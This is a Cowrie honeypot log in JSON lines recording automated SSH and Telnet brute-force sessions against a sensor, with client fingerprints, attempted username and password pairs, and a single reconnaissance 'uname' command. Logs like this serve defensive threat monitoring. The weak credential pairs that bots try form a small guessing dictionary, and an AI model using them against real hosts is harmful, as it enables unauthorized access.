{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60824,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd04e5def9f2","protocol":"ssh","message":"New connection: 212.227.235.229:60824 (1.2.3.4:22) [session: dd04e5def9f2]","sensor":"my-vps","timestamp":"2025-08-31T02:55:53.108375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:55:53.109849Z","src_ip":"212.227.235.229","session":"dd04e5def9f2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:55:53.355799Z","src_ip":"212.227.235.229","session":"dd04e5def9f2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:55:53.777986Z","src_ip":"212.227.125.160","session":"a4c9d258db03"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:55:53.778793Z","src_ip":"212.227.125.160","session":"a4c9d258db03"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":34676,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d3251d7d9d1","protocol":"ssh","message":"New connection: 41.226.27.251:34676 (1.2.3.4:22) [session: 2d3251d7d9d1]","sensor":"my-vps","timestamp":"2025-08-31T02:55:53.991650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:55:54.030416Z","src_ip":"41.226.27.251","session":"2d3251d7d9d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:55:54.035404Z","src_ip":"41.226.27.251","session":"2d3251d7d9d1"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:55:54.095803Z","src_ip":"212.227.235.229","session":"dd04e5def9f2"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:55:54.209282Z","src_ip":"41.226.27.251","session":"2d3251d7d9d1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:55:54.273089Z","src_ip":"212.227.235.229","session":"98e26cabc40f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:55:54.274311Z","src_ip":"212.227.235.229","session":"98e26cabc40f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:55:54.315952Z","src_ip":"41.226.27.251","session":"2d3251d7d9d1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:55:54.316760Z","src_ip":"41.226.27.251","session":"2d3251d7d9d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:54.361134Z","src_ip":"41.226.27.251","session":"2d3251d7d9d1"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:54.362349Z","src_ip":"41.226.27.251","session":"2d3251d7d9d1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:55:54.603139Z","src_ip":"212.227.235.229","session":"dd04e5def9f2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:55:54.603941Z","src_ip":"212.227.235.229","session":"dd04e5def9f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:54.851685Z","src_ip":"212.227.235.229","session":"dd04e5def9f2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:55:54.853057Z","src_ip":"212.227.235.229","session":"dd04e5def9f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"17.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 17.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:56:11.070171Z","src_ip":"212.227.125.160","session":"a4c9d258db03"}
{"eventid":"cowrie.session.closed","duration":"76.5","message":"Connection lost after 76.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:56:11.071708Z","src_ip":"212.227.125.160","session":"a4c9d258db03"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":53138,"dst_ip":"1.2.3.4","dst_port":22,"session":"509ccba980c9","protocol":"ssh","message":"New connection: 41.226.27.251:53138 (1.2.3.4:22) [session: 509ccba980c9]","sensor":"my-vps","timestamp":"2025-08-31T02:56:14.259345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:56:14.305700Z","src_ip":"41.226.27.251","session":"509ccba980c9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:56:14.306527Z","src_ip":"41.226.27.251","session":"509ccba980c9"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-31T02:56:14.482804Z","src_ip":"41.226.27.251","session":"509ccba980c9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:56:15.714566Z","src_ip":"41.226.27.251","session":"509ccba980c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57228,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a2adaeb818e","protocol":"ssh","message":"New connection: 212.227.235.229:57228 (1.2.3.4:22) [session: 5a2adaeb818e]","sensor":"my-vps","timestamp":"2025-08-31T02:56:18.840796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:56:19.581825Z","src_ip":"212.227.235.229","session":"5a2adaeb818e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:56:19.582762Z","src_ip":"212.227.235.229","session":"5a2adaeb818e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:56:25.520129Z","src_ip":"212.227.235.229","session":"5a2adaeb818e"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:56:27.299720Z","src_ip":"212.227.235.229","session":"5a2adaeb818e"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":34568,"dst_ip":"1.2.3.4","dst_port":22,"session":"04bf9633d2b5","protocol":"ssh","message":"New connection: 41.226.27.251:34568 (1.2.3.4:22) [session: 04bf9633d2b5]","sensor":"my-vps","timestamp":"2025-08-31T02:56:35.289432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:56:35.343387Z","src_ip":"41.226.27.251","session":"04bf9633d2b5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:56:35.344054Z","src_ip":"41.226.27.251","session":"04bf9633d2b5"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-31T02:56:35.638429Z","src_ip":"41.226.27.251","session":"04bf9633d2b5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:56:36.924955Z","src_ip":"41.226.27.251","session":"04bf9633d2b5"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:56:39.250259Z","src_ip":"212.227.235.229","session":"98e26cabc40f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47696,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c7d89a8841a","protocol":"ssh","message":"New connection: 212.227.125.160:47696 (1.2.3.4:22) [session: 0c7d89a8841a]","sensor":"my-vps","timestamp":"2025-08-31T02:56:40.164612Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:56:40.927719Z","src_ip":"212.227.125.160","session":"0c7d89a8841a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:56:40.928386Z","src_ip":"212.227.125.160","session":"0c7d89a8841a"}
{"eventid":"cowrie.session.connect","src_ip":"117.173.88.106","src_port":42548,"dst_ip":"1.2.3.4","dst_port":23,"session":"5d3f693e81e1","protocol":"telnet","message":"New connection: 117.173.88.106:42548 (1.2.3.4:23) [session: 5d3f693e81e1]","sensor":"my-vps","timestamp":"2025-08-31T02:56:41.714444Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:56:43.359740Z","src_ip":"212.227.125.160","session":"0c7d89a8841a"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:56:44.772718Z","src_ip":"212.227.125.160","session":"0c7d89a8841a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39584,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d0195fba7cc","protocol":"ssh","message":"New connection: 212.227.125.160:39584 (1.2.3.4:22) [session: 0d0195fba7cc]","sensor":"my-vps","timestamp":"2025-08-31T02:56:45.119236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:56:51.644224Z","src_ip":"212.227.125.160","session":"0d0195fba7cc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:56:51.644976Z","src_ip":"212.227.125.160","session":"0d0195fba7cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:56:54.048869Z","src_ip":"212.227.235.229","session":"98e26cabc40f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:56:54.049605Z","src_ip":"212.227.235.229","session":"98e26cabc40f"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":55308,"dst_ip":"1.2.3.4","dst_port":22,"session":"38d43281a561","protocol":"ssh","message":"New connection: 41.226.27.251:55308 (1.2.3.4:22) [session: 38d43281a561]","sensor":"my-vps","timestamp":"2025-08-31T02:56:56.103302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:56:56.187164Z","src_ip":"41.226.27.251","session":"38d43281a561"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:56:56.187884Z","src_ip":"41.226.27.251","session":"38d43281a561"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:56:56.384381Z","src_ip":"41.226.27.251","session":"38d43281a561"}
